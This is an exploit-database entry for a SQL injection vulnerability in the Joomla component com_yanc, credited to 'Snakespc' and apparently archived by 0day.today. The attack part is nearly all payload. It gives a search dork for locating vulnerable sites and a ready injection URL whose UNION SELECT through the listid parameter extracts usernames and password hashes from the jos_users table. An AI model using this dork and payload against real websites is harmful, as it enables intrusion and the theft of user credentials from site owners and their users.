Joomla Component com_yanc SQL Injection Vulnerability

2010-02-28T00:00:00
ID 1337DAY-ID-11129
Type zdt
Reporter Snakespc
Modified 2010-02-28T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
Joomla Component com_yanc SQL Injection Vulnerability
=====================================================

==============================================================================
[»] Joomla com_yanc Remote Sql Injection Vulnerability
==============================================================================
    
[»] Script:   [Joomla]
[»] Language: [ PHP ]
[»] Dork:     [inurl:index.php?option=com_yanc "listid" ]  
###########################################################################
 ===[ Exploit ]===
    
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
[»]Author: Snakespc <-
###########################################################################



#  0day.today [2018-01-10]  #